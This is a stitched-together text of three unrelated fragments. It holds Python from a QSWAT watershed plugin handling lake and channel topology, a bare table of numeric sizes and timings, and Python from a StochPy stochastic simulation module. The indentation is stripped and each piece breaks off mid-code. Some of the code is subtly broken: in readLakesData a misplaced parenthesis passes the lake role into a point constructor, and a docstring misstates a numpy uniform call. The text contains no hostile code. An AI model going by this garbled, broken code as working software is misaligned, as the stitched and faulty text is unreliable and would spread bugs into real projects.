QSWATUtils.error('There seems to be no outflow stream for lake {0}'.format(lakeId), gv.isBatch, reportErrors=reportErrors)
return -1
else:
others = list(data.keys())
others.remove(exLink)
if others != []:
QSWATUtils.information(
"""Warning: Stream link {0} chosen as main outlet for all of lake {1}.
Other possible outlet stream links are {2}.
""".format(exLink, lakeId, str([int(link) for link in others])), gv.isBatch, reportErrors=reportErrors)
self.chLinkFromLake[exLink] = lakeId
self.lakesData[lakeId].outChLink = exLink
for chLink in others:
self.chLinkFromLake[chLink] = lakeId
self.lakesData[lakeId].otherOutChLinks.add(chLink)
self.pointId += 1
self.lakesData[lakeId].outPoint = (exWsno, self.pointId, exPoint, exElev)
for lakeId, totalElev in totalElevation.items():
numInLinks = len(self.lakesData[lakeId].inChLinks)
if numInLinks > 0:
self.lakesData[lakeId].elevation = float(totalElev) / numInLinks
else:
self.lakesData[lakeId].elevation = self.lakesData[lakeId].outPoint[3]
return len(self.lakesData)
def addExistingLakes(self, lakesLayer, channelsLayer, demLayer, gv, reportErrors=True):
"""Add lakes data to existing non-grid model.
We ignore DsNodeIds for inflowing and outflowing channels since these were
probably only added previously to the snapped inlets/outlets file
and inlets/outlets are little use in any case with existing watersheds."""
lakeIdIndex = self.getIndex(lakesLayer, QSWATTopology._LAKEID)
lakeResIndex = self.getIndex(lakesLayer, QSWATTopology._RES)
channelLinkIndex = self.getIndex(channelsLayer, QSWATTopology._LINKNO)
channelDsLinkIndex = self.getIndex(channelsLayer, QSWATTopology._DSLINKNO)
channelBasinIndex = self.getIndex(channelsLayer, QSWATTopology._BASINNO)
channelLakeInIndex = self.getIndex(channelsLayer, QSWATTopology._LAKEIN)
channelLakeOutIndex = self.getIndex(channelsLayer, QSWATTopology._LAKEOUT)
channelLakeWithinIndex = self.getIndex(channelsLayer, QSWATTopology._LAKEWITHIN)
channelLakeMainIndex = self.getIndex(channelsLayer, QSWATTopology._LAKEMAIN)
if lakeIdIndex < 0 or channelLinkIndex < 0 or channelDsLinkIndex < 0 or channelBasinIndex < 0 or \
channelLakeInIndex < 0 or channelLakeOutIndex < 0 or channelLakeWithinIndex < 0 or channelLakeMainIndex < 0:
return False
self.lakesData = dict()
for lake in lakesLayer.getFeatures():
lakeId = lake[lakeIdIndex]
waterRole = lake[lakeResIndex]
if lakeId in self.lakesData:
QSWATUtils.error('Lake identifier {0} occurs twice in {1}. Lakes not added.'.format(lakeId, QSWATUtils.layerFilename(lakesLayer)),
gv.isBatch, reportErrors=reportErrors)
self.lakesData = dict()
return False
# to stop reuse of the same water body id
self.waterBodyId = max(self.waterBodyId, lakeId)
geom = lake.geometry()
area = geom.area()
centroid = geom.centroid().asPoint()
self.lakesData[lakeId] = LakeData(area, centroid, waterRole)
self.chLinkIntoLake = dict()
self.chLinkInsideLake = dict()
self.chLinkFromLake = dict()
self.outletsInLake = dict()
for channel in channelsLayer.getFeatures():
chLink = channel[channelLinkIndex]
dsLink = channel[channelDsLinkIndex]
lakeIn = channel[channelLakeInIndex]
lakeOut = channel[channelLakeOutIndex]
lakeWithin = channel[channelLakeWithinIndex]
lakeMain = channel[channelLakeMainIndex]
reachData = None
geom = None
if lakeIn != NULL and lakeIn > 0:
data = self.lakesData.get(lakeIn, None)
if data is None:
QSWATUtils.error('Channel with LINKNO {0} flows into lake {1} not defined in {2}. Lakes not added.'.
format(chLink, lakeIn, QSWATUtils.layerFilename(lakesLayer)),
gv.isBatch, reportErrors=reportErrors)
self.lakesData = dict()
return False
geom = channel.geometry()
reachData = self.getReachData(geom, demLayer)
point = QgsPointXY(reachData.lowerX, reachData.lowerY)
elev = reachData.lowerZ
data.elevation += elev
self.pointId += 1
data.inChLinks[chLink] = (self.pointId, point, elev)
self.chLinkIntoLake[chLink] = lakeIn
elif lakeWithin != NULL and lakeWithin > 0:
data = self.lakesData.get(lakeWithin, None)
if data is None:
QSWATUtils.error('Channel with LINKNO {0} inside lake {1} not defined in {2}. Lakes not added.'.
format(chLink, lakeWithin, QSWATUtils.layerFilename(lakesLayer)),
gv.isBatch, reportErrors=reportErrors)
self.lakesData = dict()
return False
data.lakeChLinks.add(chLink)
self.chLinkInsideLake[chLink] = lakeWithin
if dsLink < 0:
# watershed outlet
geom = channel.geometry()
reachData = self.getReachData(geom, demLayer)
subbasin = channel[channelBasinIndex]
data.outChLink = -1
point = QgsPointXY(reachData.lowerX, reachData.lowerY)
elev = reachData.lowerZ
self.pointId += 1
data.outPoint = (subbasin, self.pointId, point, elev)
self.outletsInLake[subbasin] = lakeWithin
if lakeOut != NULL and lakeOut > 0:
data = self.lakesData.get(lakeOut, None)
if data is None:
QSWATUtils.error('Channel with LINKNO {0} flows out of lake {1} not defined in {2}. Lakes not added.'.
format(chLink, lakeOut, QSWATUtils.layerFilename(lakesLayer)),
gv.isBatch, reportErrors=reportErrors)
self.lakesData = dict()
return False
if lakeMain != NULL and lakeMain == lakeOut:
# lake's main outlet
# channel leaves lake at upper end
geom = channel.geometry()
reachData = self.getReachData(geom, demLayer)
subbasin = channel[channelBasinIndex]
data.outChLink = chLink
point = QgsPointXY(reachData.upperX, reachData.upperY)
elev = reachData.upperZ
self.pointId += 1
data.outPoint = (subbasin, self.pointId, point, elev)
self.chLinkFromLake[chLink] = lakeOut
else:
# other outlet
data.otherOutChLinks.add(chLink)
# define lake elevation
for data in self.lakesData.values():
numInflows = len(data.inChLinks)
data.elevation = data.outPoint[3] if numInflows == 0 else float(data.elevation) / numInflows
return True
@staticmethod
def intersectsPoly(geom, polyGeom, polyRect):
"""Returns true if any part of geom intersects any part of polyGeom, which has associated rectangle polyRect."""
geoRect = geom.boundingBox()
if QSWATTopology.disjointBoxes(geoRect, polyRect):
return False
else:
return geom.intersects(polyGeom)
@staticmethod
def disjointBoxes(box1, box2):
"""Return True if the boxes are disjoint."""
return box1.xMinimum() > box2.xMaximum() or \
box1.xMaximum() < box2.xMinimum() or \
box1.yMinimum() > box2.yMaximum() or \
box1.yMaximum() < box2.yMinimum()
@staticmethod
def polyContains(point, polyGeom, polyRect):
"""Return true if point within polyGeom, which has associated rectangle polyRect."""
if polyRect.xMinimum() < point.x() < polyRect.xMaximum() and \
polyRect.yMinimum() < point.y() < polyRect.yMaximum():
return polyGeom.contains(point)
else:
return False
def saveLakesData(self, db):
"""Save lakes data in project database."""
with db.conn as conn:
if not conn:
return
curs = conn.cursor()
lakesTable = 'LAKESDATA'
clearSQL = 'DROP TABLE IF EXISTS ' + lakesTable
curs.execute(clearSQL)
curs.execute(db._CREATELAKESDATA)
linksTable = 'LAKELINKS'
clearSQL = 'DROP TABLE IF EXISTS ' + linksTable
curs.execute(clearSQL)
curs.execute(db._CREATELAKELINKS)
basinsTable = 'LAKEBASINS'
clearSQL = 'DROP TABLE IF EXISTS ' + basinsTable
curs.execute(clearSQL)
curs.execute(db._CREATELAKEBASINS)
for lakeId, lakeData in self.lakesData.items():
curs.execute(db._INSERTLAKESDATA, (lakeId, lakeData.outPoint[0], lakeData.waterRole, lakeData.area, lakeData.elevation, lakeData.outChLink,
lakeData.outPoint[1], lakeData.outPoint[2].x(), lakeData.outPoint[2].y(),
lakeData.outPoint[3], lakeData.centroid.x(), lakeData.centroid.y()))
# QSWATUtils.loginfo(str(lakeData.inChLinks.keys()))
# QSWATUtils.loginfo(str(lakeData.lakeChLinks))
for chLink, (pointId, pt, elev) in lakeData.inChLinks.items():
try:
curs.execute(db._INSERTLAKELINKS, (chLink, lakeId, True, False, pointId, pt.x(), pt.y(), elev))
except:
QSWATUtils.error('Failed to add in channel link {0}'.format(chLink), self.isBatch)
for chLink in lakeData.lakeChLinks:
try:
curs.execute(db._INSERTLAKELINKS, (chLink, lakeId, False, True, None, None, None, None))
except:
QSWATUtils.error('Failed to add inside channel link {0}'.format(chLink), self.isBatch)
for chLink in lakeData.otherOutChLinks:
try:
curs.execute(db._INSERTLAKELINKS, (chLink, lakeId, False, False, None, None, None, None))
except:
QSWATUtils.error('Failed to add other out channel link {0}'.format(chLink), self.isBatch)
for subbasin, lakeId in self.outletsInLake.items():
curs.execute(db._INSERTLAKEBASINS, (subbasin, lakeId))
db.hashDbTable(conn, lakesTable)
db.hashDbTable(conn, linksTable)
db.hashDbTable(conn, basinsTable)
def readLakesData(self, db):
"""Read lakes data from project database. Return true if data read OK, false if no data or error."""
with db.conn as conn:
if not conn:
return False
self.lakesData.clear()
self.chLinkIntoLake.clear()
self.chLinkInsideLake.clear()
self.chLinkFromLake.clear()
self.outletsInLake.clear()
curs = conn.cursor()
lakesTable = 'LAKESDATA'
linksTable = 'LAKELINKS'
basinsTable = 'LAKEBASINS'
lakeSql = db.sqlSelect(lakesTable, '*', '', '')
linksSql = db.sqlSelect(linksTable, '*', '', 'lakeid=?')
basinsSql = db.sqlSelect(basinsTable, '*', '', '')
try: # in case old database without these tables
# without fetchall this only reads first row. Strange
for lakeRow in curs.execute(lakeSql).fetchall():
lakeId = lakeRow['id']
self.waterBodyId = max(self.waterBodyId, lakeId)
self.lakesData[lakeId] = LakeData(lakeRow['area'], QgsPointXY(lakeRow['centroidx'], lakeRow['centroidy'], lakeRow['role']))
outChLink = lakeRow['outlink']
self.lakesData[lakeId].outChLink = outChLink
self.chLinkFromLake[outChLink] = lakeId
self.lakesData[lakeId].outPoint = (lakeRow['subbasin'], lakeRow['outletid'],
QgsPointXY(lakeRow['outletx'], lakeRow['outlety']), lakeRow['outletelev'])
self.lakesData[lakeId].centroid = QgsPointXY(lakeRow['centroidx'], lakeRow['centroidy'])
self.lakesData[lakeId].elevation = lakeRow['meanelev']
for linkRow in curs.execute(linksSql, (lakeId,)):
chLink = linkRow['linkno']
if linkRow['inside']:
self.lakesData[lakeId].lakeChLinks.add(chLink)
self.chLinkInsideLake[chLink] = lakeId
elif linkRow['inlet']:
self.lakesData[lakeId].inChLinks[chLink] = (linkRow['inletid'],
QgsPointXY(linkRow['inletx'], linkRow['inlety']), linkRow['inletelev'])
self.chLinkIntoLake[chLink] = lakeId
else:
self.lakesData[lakeId].otherOutChLinks.add(chLink)
self.chLinkFromLake[chLink] = lakeId
for basinRow in curs.execute(basinsSql).fetchall():
self.outletsInLake[basinRow['subbasin']] = basinRow['lakeid']
return len(self.lakesData) > 0
except:
QSWATUtils.loginfo('Reading lakes data failed: {0}'.format(traceback.format_exc()))
return False
def getDownChannel(self, channel):
"""Get downstream channel, skipping zero-length channels.
Returns -1 if the channel flows into a lake."""
if channel in self.chLinkIntoLake:
return -1
while True:
dsChannel = self.downChannels[channel]
if dsChannel in self.zeroChannels:
channel = dsChannel
else:
return dsChannel
def setChannelBasinAreas(self, gv):
"""
Define map chBasinAreas from channel basin to basin area in sq m.
Done by counting pixels in the wChannel file (as an alternative to creating a shapefile from it).
Not used | |
<gh_stars>1-10
[262144, 18, 0, 0, 0, 0.303334],
[262440, 3, 8, 1, 0, 0.428383],
[262500, 2, 1, 5, 1, 0.530909],
[263424, 8, 1, 0, 3, 0.461892],
[264600, 3, 3, 2, 2, 0.454827],
[268800, 9, 1, 2, 1, 0.455837],
[268912, 4, 0, 0, 5, 0.482812],
[270000, 4, 3, 4, 0, 0.417645],
[272160, 5, 5, 1, 1, 0.46049],
[273375, 0, 7, 3, 0, 3.18881],
[274400, 5, 0, 2, 3, 0.442455],
[275562, 1, 9, 0, 1, 3.19153],
[275625, 0, 2, 4, 2, 3.19306],
[276480, 11, 3, 1, 0, 0.389498],
[277830, 1, 4, 1, 3, 3.14069],
[279936, 7, 7, 0, 0, 0.379176],
[280000, 6, 0, 4, 1, 0.416051],
[281250, 1, 2, 6, 0, 4.2619],
[282240, 7, 2, 1, 2, 0.462522],
[283500, 2, 4, 3, 1, 0.513674],
[285768, 3, 6, 0, 2, 0.487626],
[286720, 13, 0, 1, 1, 0.401789],
[288000, 8, 2, 3, 0, 0.440664],
[288120, 3, 1, 1, 4, 0.585384],
[290304, 9, 4, 0, 1, 0.426227],
[291600, 4, 6, 2, 0, 0.449147],
[294000, 4, 1, 3, 2, 0.529674],
[294912, 15, 2, 0, 0, 0.374028],
[295245, 0, 10, 1, 0, 3.99429],
[296352, 5, 3, 0, 3, 0.481133],
[297675, 0, 5, 2, 2, 4.00362],
[300000, 5, 1, 5, 0, 0.496454],
[300125, 0, 0, 3, 4, 4.18224],
[301056, 11, 1, 0, 2, 0.458198],
[302400, 6, 3, 2, 1, 0.459105],
[302526, 1, 2, 0, 5, 4.17258],
[303750, 1, 5, 4, 0, 4.16032],
[306180, 2, 7, 1, 1, 0.584013],
[306250, 1, 0, 5, 2, 3.53944],
[307200, 12, 1, 2, 0, 0.429037],
[307328, 7, 0, 0, 4, 0.480741],
[308700, 2, 2, 2, 3, 0.610906],
[311040, 8, 5, 1, 0, 0.491944],
[312500, 2, 0, 7, 0, 0.552553],
[313600, 8, 0, 2, 2, 0.483456],
[314928, 4, 9, 0, 0, 0.466044],
[315000, 3, 2, 4, 1, 0.558447],
[317520, 4, 4, 1, 2, 0.529411],
[320000, 9, 0, 4, 0, 0.454816],
[321489, 0, 8, 0, 2, 3.72835],
[322560, 10, 2, 1, 1, 0.516705],
[324000, 5, 4, 3, 0, 0.4634],
[324135, 0, 3, 1, 4, 3.67287],
[326592, 6, 6, 0, 1, 0.499383],
[327680, 16, 0, 1, 0, 0.436273],
[328050, 1, 8, 2, 0, 4.2825],
[328125, 0, 1, 6, 1, 3.28932],
[329280, 6, 1, 1, 3, 0.605976],
[330750, 1, 3, 3, 2, 3.29709],
[331776, 12, 4, 0, 0, 0.395057],
[333396, 2, 5, 0, 3, 0.623967],
[336000, 7, 1, 3, 1, 0.576329],
[336140, 2, 0, 1, 5, 0.682057],
[337500, 2, 3, 5, 0, 0.609307],
[338688, 8, 3, 0, 2, 0.504626],
[340200, 3, 5, 2, 1, 0.566975],
[343000, 3, 0, 3, 3, 0.598426],
[344064, 14, 1, 0, 1, 0.502549],
[345600, 9, 3, 2, 0, 0.499896],
[345744, 4, 2, 0, 4, 0.591918],
[349920, 5, 7, 1, 0, 0.528045],
[350000, 4, 0, 5, 1, 0.575812],
[351232, 10, 0, 0, 3, 0.527869],
[352800, 5, 2, 2, 2, 0.554768],
[352947, 0, 1, 0, 6, 4.62179],
[354294, 1, 11, 0, 0, 4.6245],
[354375, 0, 4, 4, 1, 4.2623],
[357210, 1, 6, 1, 2, 4.26022],
[358400, 11, 0, 2, 1, 0.494177],
[360000, 6, 2, 4, 0, 0.515534],
[360150, 1, 1, 2, 4, 4.98297],
[362880, 7, 4, 1, 1, 0.556127],
[364500, 2, 6, 3, 0, 0.655639],
[367416, 3, 8, 0, 1, 0.58193],
[367500, 2, 1, 4, 2, 0.717368],
[368640, 13, 2, 1, 0, 0.501595],
[370440, 3, 3, 1, 3, 0.713126],
[373248, 9, 6, 0, 0, 0.547194],
[375000, 3, 1, 6, 0, 0.676057],
[376320, 9, 1, 1, 2, 0.672377],
[378000, 4, 3, 3, 1, 0.634104],
[381024, 5, 5, 0, 2, 0.582933],
[382725, 0, 7, 2, 1, 5.03005],
[384000, 10, 1, 3, 0, 0.601125],
[384160, 5, 0, 1, 4, 0.661314],
[385875, 0, 2, 3, 3, 4.52545],
[387072, 11, 3, 0, 1, 0.544472],
[388800, 6, 5, 2, 0, 0.55158],
[388962, 1, 4, 0, 4, 4.36593],
[390625, 0, 0, 8, 0, 4.36731],
[392000, 6, 0, 3, 2, 0.58893],
[393216, 17, 1, 0, 0, 0.519293],
[393660, 2, 9, 1, 0, 0.701932],
[393750, 1, 2, 5, 1, 4.84566],
[395136, 7, 2, 0, 3, 0.633169],
[396900, 2, 4, 2, 2, 0.68121],
[400000, 7, 0, 5, 0, 0.559009],
[401408, 13, 0, 0, 2, 0.505121],
[403200, 8, 2, 2, 1, 0.613976],
[403368, 3, 1, 0, 5, 0.815144],
[405000, 3, 4, 4, 0, 0.62146],
[408240, 4, 6, 1, 1, 0.718326],
[409600, 14, 0, 2, 0, 0.480595],
[411600, 4, 1, 2, 3, 0.760055],
[413343, 0, 10, 0, 1, 4.72772],
[414720, 10, 4, 1, 0, 0.588263],
[416745, 0, 5, 1, 3, 4.33026],
[419904, 6, 8, 0, 0, 0.525634],
[420000, 5, 1, 4, 1, 0.697228],
[420175, 0, 0, 2, 5, 5.30346],
[421875, 0, 3, 6, 0, 5.29905],
[423360, 6, 3, 1, 2, 0.68153],
[425250, 1, 5, 3, 1, 5.29279],
[428652, 2, 7, 0, 2, 0.73583],
[428750, 1, 0, 4, 3, 5.30926],
[430080, 12, 1, 1, 1, 0.688284],
[432000, 7, 3, 3, 0, 0.610281],
[432180, 2, 2, 1, 4, 0.875485],
[435456, 8, 5, 0, 1, 0.644869],
[437400, 3, 7, 2, 0, 0.679363],
[437500, 2, 0, 6, 1, 0.843908],
[439040, 8, 0, 1, 3, 0.727313],
[441000, 3, 2, 3, 2, 0.787583],
[442368, 14, 3, 0, 0, 0.526695],
[444528, 4, 4, 0, 3, 0.720437],
[448000, 9, 0, 3, 1, 0.705895],
[450000, 4, 2, 5, 0, 0.730069],
[451584, 10, 2, 0, 2, 0.673668],
[453600, 5, 4, 2, 1, 0.652393],
[453789, 0, 3, 0, 5, 5.09819],
[455625, 0, 6, 4, 0, 5.10391],
[458752, 16, 0, 0, 1, 0.582264],
[459270, 1, 8, 1, 1, 5.10375],
[459375, 0, 1, 5, 2, 5.11197],
[460800, 11, 2, 2, 0, 0.615755],
[460992, 6, 1, 0, 4, 0.786331],
[463050, 1, 3, 2, 3, 6.00879],
[466560, 7, 6, 1, 0, 0.698346],
[468750, 1, 1, 7, 0, 7.25906],
[470400, 7, 1, 2, 2, 0.738217],
[470596, 2, 0, 0, 6, 0.893448],
[472392, 3, 10, 0, 0, 0.730821],
[472500, 2, 3, 4, 1, 0.854758],
[476280, 3, 5, 1, 2, 0.846693],
[480000, 8, 1, 4, 0, 0.716938],
[480200, 3, 0, 2, 4, 0.834781],
[483840, 9, 3, 1, 1, 0.80629],
[486000, 4, 5, 3, 0, 0.753901],
[489888, 5, 7, 0, 1, 0.716337],
[490000, 4, 0, 4, 2, 0.762128],
[491520, 15, 1, 1, 0, 0.708184],
[492075, 0, 9, 2, 0, 6.00789],
[493920, 5, 2, 1, 3, 0.876576],
[496125, 0, 4, 3, 2, 6.01528],
[497664, 11, 5, 0, 0, 0.65836],
[500000, 5, 0, 6, 0, 0.754167],
[500094, 1, 6, 0, 3, 7.06031],
[501760, 11, 0, 1, 2, 0.750931],
[504000, 6, 2, 3, 1, 0.803884],
[504210, 1, 1, 1, 5, 7.06907],
[506250, 1, 4, 5, 0, 7.0764],
[508032, 7, 4, 0, 2, 0.697745],
[510300, 2, 6, 2, 1, 0.924316],
[512000, 12, 0, 3, 0, 0.674464],
[514500, 2, 1, 3, 3, 1.04891],
[516096, 13, 2, 0, 1, 0.692562],
[518400, 8, 4, 2, 0, 0.668166],
[518616, 3, 3, 0, 4, 0.910998],
[524288, 19, 0, 0, 0, 0.571635],
[524880, 4, 8, 1, 0, 0.780152],
[525000, 3, 1, 5, 1, 0.978398],
[526848, 9, 1, 0, 3, 0.922844],
[529200, 4, 3, 2, 2, 0.842967],
[531441, 0, 12, 0, 0, 6.20779],
[535815, 0, 7, 1, 2, 6.21667],
[537600, 10, 1, 2, 1, 0.857613],
[537824, 5, 0, 0, 5, 0.899876],
[540000, 5, 3, 4, 0, 0.758291],
[540225, 0, 2, 2, 4, 7.60709],
[544320, 6, 5, 1, 1, 0.877678],
[546750, 1, 7, 3, 0, 7.5993],
[546875, 0, 0, 7, 1, 6.34296],
[548800, 6, 0, 2, 3, 0.84308],
[551124, 2, 9, 0, 1, 0.977769],
[551250, 1, 2, 4, 2, 6.34616],
[552960, 12, 3, 1, 0, 0.762534],
[555660, 2, 4, 1, 3, 1.08122],
[559872, 8, 7, 0, 0, 0.718067],
[560000, 7, 0, 4, 1, 0.788241],
[562500, 2, 2, 6, 0, 1.06725],
[564480, 8, 2, 1, 2, 0.894466],
[567000, 3, 4, 3, 1, 0.927108],
[571536, 4, 6, 0, 2, 0.918767],
[573440, 14, 0, 1, 1, 0.789791],
[576000, 9, 2, 3, 0, 0.880239],
[576240, 4, 1, 1, 4, 1.11588],
[580608, 10, 4, 0, 1, 0.796861],
[583200, 5, 6, 2, 0, 0.833449],
[583443, 0, 5, 0, 4, 6.43371],
[588000, 5, 1, 3, 2, 1.00023],
[588245, 0, 0, 1, 6, 6.43621],
[589824, 16, 2, 0, 0, 0.729085],
[590490, 1, 10, 1, 0, 8.54966],
[590625, 0, 3, 5, 1, 7.9221],
[592704, 6, 3, 0, 3, 0.927415],
[595350, 1, 5, 2, 2, 7.93371],
[600000, 6, 1, 5, 0, 0.939427],
[600250, 1, 0, 3, 4, 7.96864],
[602112, 12, 1, 0, 2, 0.884506],
[604800, 7, 3, 2, 1, 0.868979],
[605052, 2, 2, 0, 5, 1.21321],
[607500, 2, 5, 4, 0, 1.0272],
[612360, 3, 7, 1, 1, 1.08049],
[612500, 2, 0, 5, 2, 1.12267],
[614400, 13, 1, 2, 0, 0.820382],
[614656, 8, 0, 0, 4, 0.922057],
[617400, 3, 2, 2, 3, 1.13522],
[622080, 9, 5, 1, 0, 0.993679],
[625000, 3, 0, 7, 0, 0.987692],
[627200, 9, 0, 2, 2, 0.944379],
[629856, 5, 9, 0, 0, 0.862795],
[630000, 4, 2, 4, 1, 1.03049],
[635040, 5, 4, 1, 2, 0.991658],
[637875, 0, 6, 3, 1, 7.03471],
[640000, 10, 0, 4, 0, 0.859725],
[642978, 1, 8, 0, 2, 7.39767],
[643125, 0, 1, 4, 3, 7.37907],
[645120, 11, 2, 1, 1, 1.00396],
[648000, 6, 4, 3, 0, 0.871443],
[648270, 1, 3, 1, 4, 7.22079],
[653184, 7, 6, 0, 1, 0.950992],
[655360, 17, 0, 1, 0, 0.851658],
[656100, 2, 8, 2, 0, 1.02841],
[656250, 1, 1, 6, 1, 6.82084],
[658560, 7, 1, 1, 3, 1.16936],
[661500, 2, 3, 3, 2, 1.22952],
[663552, 13, 4, 0, 0, 0.750628],
[666792, 3, 5, 0, 3, 1.14195],
[672000, 8, 1, 3, 1, 1.10406],
[672280, 3, 0, 1, 5, 1.3236],
[675000, 3, 3, 5, 0, 1.10877],
[677376, 9, 3, 0, 2, 1.03022],
[680400, 4, 5, 2, 1, 1.0823],
[686000, 4, 0, 3, 3, 1.1701],
[688128, 15, 1, 0, 1, 0.965973],
[688905, 0, 9, 1, 1, | |
at ~15 species).
- *IsOnlyLastTimepoint* [default = False] (boolean)
- *critical_reactions* [default = [] ] (list) ONLY for the tau-leaping method where the user can pre-define reactions that are "critical". Critical reactions can fire only once per time step.
- *reaction_orders* [default = [] (list) ONLY for the tau-leaping method
- *species_HORs* [default = [] (list) ONLY for the tau-leaping method
- *species_max_influence* [default = []] (list) ONLY for the tau-leaping method
- *quiet* [default = False] suppress print statements
"""
if self._IsQuiet:
quiet = True
if species_selection and isinstance(species_selection,str):
species_selection = [species_selection]
if species_selection and isinstance(species_selection,list):
for s_id in species_selection:
assert s_id in self.SSA.species_names, "Species {0} is not in the model or species selection".format(s_id)
self._IsTrackPropensities = IsTrackPropensities
if rate_selection and isinstance(rate_selection,str):
rate_selection = [rate_selection]
self._IsTrackPropensities = True
if rate_selection and isinstance(rate_selection,list):
for r_id in rate_selection:
assert r_id in self.SSA.rate_names, "Reaction {0} is not in the model or reaction selection".format(r_id)
self._IsTrackPropensities = True
self._IsOnlyLastTimepoint = IsOnlyLastTimepoint
if mode != False:
self.Mode(sim_mode = mode)
self._IsModeSetByUser = False
elif mode == False and self.sim_mode != 'steps' and not self._IsModeSetByUser:
self.Mode('steps')
if end != False:
if type(end) in [int,float,np.float64,np.float32]:
self.sim_end = end
else:
print("*** WARNING ***: 'end' should be an integer or float\n 1000 is used by default")
self.sim_end = 1000
self._IsEndSetByUser=False
elif end == False and self.sim_end != 1000 and not self._IsEndSetByUser:
self.sim_end = 1000
self.data_stochsim = IntegrationStochasticDataObj()
self.data_stochsim_grid = RegularGridDataObj()
if method != False:
self.Method(method)
self._MethodSetBy = "DoStochSim"
elif method == False and self.sim_method_name != "Direct" and self._MethodSetBy == "DoStochSim":
self.Method("Direct")
# If DoStochSim not called from DoDelayedStochSim, the method should never be delayed.
if (self._IsDelayedMethod or self._IsSingleMoleculeMethod) and self._MethodSetBy != "Script": # 08-01-2014
print("*** WARNING ***: ({0:s}) was selected. Switching to the direct method.".format(self.sim_method_name))
self.Method('Direct')
self._MethodSetBy = "DoStochSim"
if reaction_orders != False:
if not quiet:
print("Info: reaction orders {0} replaced with {1}".format(self.SSA.parse.reaction_orders, reaction_orders))
self.SSA.parse.reaction_orders = reaction_orders
if species_HORs != False:
self.SSA.parse.species_HORs = species_HORs
if not quiet:
print("Info: species HORs {0} replaced with {1}".format(self.SSA.parse.species_HORs, species_HORs))
if species_max_influence != False:
self.SSA.parse.species_max_influence = species_max_influence
if not quiet:
print("Info: species max influence {0} replaced with {1}".format(self.SSA.parse.species_max_influence, species_max_influence))
if trajectories != False:
self.Trajectories(trajectories)
self._IsTrajectoriesSetByUser = False
elif trajectories == False and self.sim_trajectories != 1 and not self._IsTrajectoriesSetByUser:
self.Trajectories(1)
self._IsFixedIntervalMethod = False
self.HAS_AVERAGE = False
if self._IsDeletePreviousSimulationData:
self.DeleteTempfiles() # Delete '.dat' files
if not quiet:
if self.sim_trajectories == 1:
print("Info: 1 trajectory is generated")
else:
print("Info: {0:d} trajectories are generated".format(self.sim_trajectories))
print("Info: Time simulation output of the trajectories is stored at {0:s} in directory: {1:s}".format(self.model_file[:-4]+'(trajectory).dat',self.temp_dir))
progressBar = Progress_bar(cycles_total = self.sim_trajectories, done_msg = 'time') ##Progress bar addition## Shows Simulation time afterwards
for self._current_trajectory in range(1,self.sim_trajectories+1):
if self.sim_trajectories > 1:
IsStatusBar = False
else:
IsStatusBar = True
t1 = time.time()
if self.sim_mode.lower() == 'time':
self.settings = SSASettings(x_matrix=self.SSA.X_matrixinit,timesteps=10**50,starttime=0,endtime=self.sim_end, track_propensities=self._IsTrackPropensities, species_selection=species_selection,rate_selection = rate_selection,last_timepoint=IsOnlyLastTimepoint,seed = self._IsSeed,quiet = quiet)
elif self.sim_mode.lower() == 'steps':
self.settings = SSASettings(x_matrix=self.SSA.X_matrixinit,timesteps=self.sim_end,starttime=0,endtime=10**50, track_propensities=self._IsTrackPropensities, species_selection=species_selection,rate_selection = rate_selection,last_timepoint=IsOnlyLastTimepoint,seed = self._IsSeed,quiet = quiet)
else:
print("*** WARNING ***: Simulation mode should be 'time' or 'steps'. Steps is done by default")
self.settings = SSASettings(x_matrix=self.SSA.X_matrixinit,timesteps=self.sim_end,starttime=0,endtime=10**50, track_propensities=self._IsTrackPropensities, species_selection=species_selection,rate_selection = rate_selection,last_timepoint=IsOnlyLastTimepoint,seed = self._IsSeed,quiet = quiet)
if self.sim_method_name.lower() == "tauleaping":
self.SSA.Execute(self.settings,IsStatusBar,epsilon,critical_reactions)
else:
self.SSA.Execute(self.settings,IsStatusBar)
self.data_stochsim = IntegrationStochasticDataObj()
self.FillDataStochsim()
if self.sim_trajectories == 1 and not quiet:
print("Info: Number of time steps {0:d} End time {1}".format(self.SSA.timestep,self.SSA.sim_t))
elif self.sim_trajectories > 1:
self.DumpTrajectoryData(self._current_trajectory)
progressBar.update(quiet=quiet) #Progress bar addition, only for multiple trajectories
self._IsSimulationDone = True
self.sim_trajectories_done = copy.copy(self.sim_trajectories)
try:
self.plot = Analysis.DoPlotting(self.data_stochsim.species_labels,self.sim_rates_tracked,self.plot.plotnum,quiet)
except:
self.plot = Analysis.DoPlotting(self.data_stochsim.species_labels,self.sim_rates_tracked,quiet=quiet)
if IsStatusBar:
t2 = time.time()
self.simulation_time = t2-t1
if not quiet:
print("Info: Simulation time {0:1.5f}".format(self.simulation_time))
else:
self.simulation_time = progressBar.end_time - progressBar.t1
if IsOnlyLastTimepoint and not quiet:
print('Info: not enough data points (are stored) to determine statistics.')
def SetDelayParameters(self, delay_distributions, nonconsuming_reactions = None):
"""
Assign the delay input to the SSA.
Input:
- *delay_distributions* (dict) with reaction name (or index) as key and distribution as value.
- *nonconsuming_reactions* (list) [default = None]
All reactions are assumed to be consuming reactions. Consuming and nonconsuming reactions are defined according to <NAME> (2007), "Exact stochastic simulation of coupled chemical reactions with delays", J.Phys. Chem. 126:124108.
Example: SetDelayParameters(delay_distributions = {'R1':('fixed',3), 'R2':('gamma',5,1)}, nonconsuming_reactions = ['R2'])
- Reaction 'R1' will get a delay of 3 seconds and reaction 'R2' a gamma distributed delay with shape=5 and scale=1.
- Reaction 'R1' will be a consuming reaction, and 'R2' a nonconsuming reaction.
Value of *delay_distributions* can be any distribution of numpy.random, e.g.:
- ('gamma', p1,p2) = np.random.gamma(p1,p2) #Where p1 is the shape parameter and p2 the scale parameter.
- ('exponential', p1) = np.random.exponential(p1) #Where p1 is the scale parameter (NOT the rate).
- ('uniform', lower, upper) = np.random.uniform(0,lower,upper)
"""
# Parse the distribution dictionary to two dictionaries. These have reaction indices as keys and values are resp. distribution functions and parameter lists.
self.delay_distributions, self.delay_distr_parameters = ParseDistributions(delay_distributions, self.SSA.rate_names) # use all rate names, because this is done before the simulation starts
delayed_reactions = list(self.delay_distributions)
if nonconsuming_reactions == None: # ==None to recognize 0 as reaction index.
self.delayed_nonconsuming = []
self.delayed_consuming = delayed_reactions # All reactions consuming
else: # Nonconsuming reactions supplied
self.delayed_nonconsuming = convertInput2Indices(nonconsuming_reactions, self.SSA.rate_names)
self.delayed_nonconsuming = [r for r in self.delayed_nonconsuming if r in delayed_reactions] # Selects nonconsuming reactions that have a delay distribution.
